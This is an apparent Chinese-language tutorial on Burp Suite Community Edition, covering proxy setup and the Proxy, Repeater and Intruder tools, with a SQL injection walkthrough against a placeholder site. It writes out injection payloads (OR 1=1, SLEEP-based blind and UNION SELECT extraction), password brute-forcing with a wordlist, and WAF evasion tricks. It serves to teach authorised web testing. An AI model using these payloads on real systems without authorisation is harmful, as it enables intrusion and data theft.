Burp Suite 社区版：Web 渗透测试的基石探索

1. 安装与配置

安装

• 官网下载：https://portswigger.net/burp/communitydownload

• 启动（Java 环境需已安装）：```
  

  java -jar burpsuite_community_v2023.6.2.jar

浏览器代理配置

1. 设置 Burp 代理监听：

   • 打开 Burp → Proxy → Options → 确认 127.0.0.1:8080 处于启用状态。

2. 浏览器配置（以 Firefox 为例）：

   • 进入 设置 → 网络设置 → 手动代理配置：

     • HTTP Proxy: 127.0.0.1, Port: 8080

     • 勾选 "Also use this proxy for HTTPS"

3. 安装 CA 证书（拦截 HTTPS 流量必需）：

   • 访问 http://burp → 点击 CA Certificate 下载证书。

   • 浏览器导入证书（Firefox：设置 → 隐私与安全 → 证书 → 导入）。

2. 核心模块与功能

Proxy（代理拦截）

用途：拦截、查看和修改 HTTP/S 请求。
操作示例：

1. 开启拦截：

   • Proxy → Intercept → 点击 Intercept is on。

2. 浏览器访问 http://test.com/login，Burp 会捕获请求：
   

   GET /login HTTP/1.1
   Host: test.com
   User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0)

3. 修改请求（如添加 SQL 注入测试）：```
   

   GET /login?username=admin' OR 1=1-- -&password=123 HTTP/1.1

4. 点击 Forward 发送修改后的请求。

Target（目标管理）

用途：定义测试范围，查看站点地图。
操作示例：

1. 添加目标：

   • Target → Scope → 输入 http://test.com。

2. 查看站点结构：

   • Target → Site map → 展开域名查看所有请求路径。

Scanner（漏洞扫描，社区版功能有限）

用途：自动检测常见漏洞（如 XSS、SQLi）。
操作示例：

1. 右键目标 URL → Scan。

2. 查看结果：

   • Dashboard → 显示漏洞等级和类型（如 Medium: SQL Injection）。

Repeater（请求重放）

用途：手动修改并重复发送请求，测试漏洞。
操作示例：

1. 在 Proxy 拦截的请求上右键 → Send to Repeater。

2. 在 Repeater 标签中修改参数：```
   

   GET /profile?id=1 AND SLEEP(5) HTTP/1.1

3. 点击 Send 观察响应时间，判断是否存在时间盲注。

Intruder（暴力破解与模糊测试）

用途：自动化参数爆破（如目录枚举、密码猜解）。
操作示例（爆破登录密码）：

1. 拦截登录请求 → 右键 → Send to Intruder。

2. 设置攻击类型为 Sniper。

3. 在 Positions 标签中标记密码参数：```
   

   POST /login HTTP/1.1
   ...
   username=admin&password=§123§

4. Payloads 标签加载字典（如 rockyou.txt）。

5. 点击 Start attack，观察响应长度差异，找到成功密码。

3. 实战案例：测试 SQL 注入漏洞

步骤 1：拦截请求

1. 浏览器访问 http://test.com/item?id=1。

2. Burp 拦截请求并发送到 Repeater。

步骤 2：探测注入点

修改 id 参数测试：

GET /item?id=1' HTTP/1.1

若返回数据库错误（如 MySQL Syntax Error），说明存在注入点。

步骤 3：利用 Union 注入

构造 Payload：

GET /item?id=1' UNION SELECT 1,version(),3-- - HTTP/1.1

响应中显示数据库版本：

<div class="description">5.7.39-log</div>

4. 高级技巧

绕过 WAF 过滤

• 分块传输：在 Proxy → Options → 启用 Match and Replace 规则，将请求转换为分块编码。

• 编码混淆：使用 Ctrl+U 对参数进行 URL 编码。

匹配与替换（Match and Replace）

自动修改请求头/参数：

1. Proxy → Options → Match and Replace → 添加规则：

   • Match: User-Agent:.*

   • Replace: User-Agent: Googlebot/2.1

5. 输出示例

Scanner 报告片段

Issue: SQL Injection (Time-Based Blind)
Severity: High
URL: http://test.com/login
Parameter: username
Evidence: 响应延迟 5 秒（Payload: admin' AND SLEEP(5)-- -）

Intruder 攻击结果

Payload    Status  Length  Time
admin      200     1200    300ms
password   200     1200    310ms
123456     302      800    150ms  ← 可能成功的登录

6. 注意事项

1. 合法授权：仅在授权范围内测试。

2. HTTPS 拦截：确保正确安装 CA 证书。

3. 性能影响：拦截模式下可能降低浏览器速度。

4. 社区版限制：无法保存项目或使用主动扫描（可配合 OWASP ZAP 弥补）。

通过以上步骤，以利用 Burp Suite Community Edition 完成基础的 Web